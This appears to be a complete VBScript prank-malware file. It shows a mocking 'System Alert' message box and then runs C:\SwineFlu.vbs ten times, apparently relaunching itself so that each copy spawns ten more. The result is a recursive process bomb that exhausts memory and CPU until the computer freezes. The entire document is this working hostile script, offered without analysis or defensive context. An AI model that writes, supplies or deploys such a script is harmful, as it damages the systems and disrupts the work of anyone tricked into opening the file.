MsgBox "You have clicked on an unknown file. How silly of you!", 48, "System Alert"
CreateObject("WScript.Shell").Run("""C:\SwineFlu.vbs""")
CreateObject("WScript.Shell").Run("""C:\SwineFlu.vbs""")
CreateObject("WScript.Shell").Run("""C:\SwineFlu.vbs""")
CreateObject("WScript.Shell").Run("""C:\SwineFlu.vbs""")
CreateObject("WScript.Shell").Run("""C:\SwineFlu.vbs""")
CreateObject("WScript.Shell").Run("""C:\SwineFlu.vbs""")
CreateObject("WScript.Shell").Run("""C:\SwineFlu.vbs""")
CreateObject("WScript.Shell").Run("""C:\SwineFlu.vbs""")
CreateObject("WScript.Shell").Run("""C:\SwineFlu.vbs""")
CreateObject("WScript.Shell").Run("""C:\SwineFlu.vbs""")
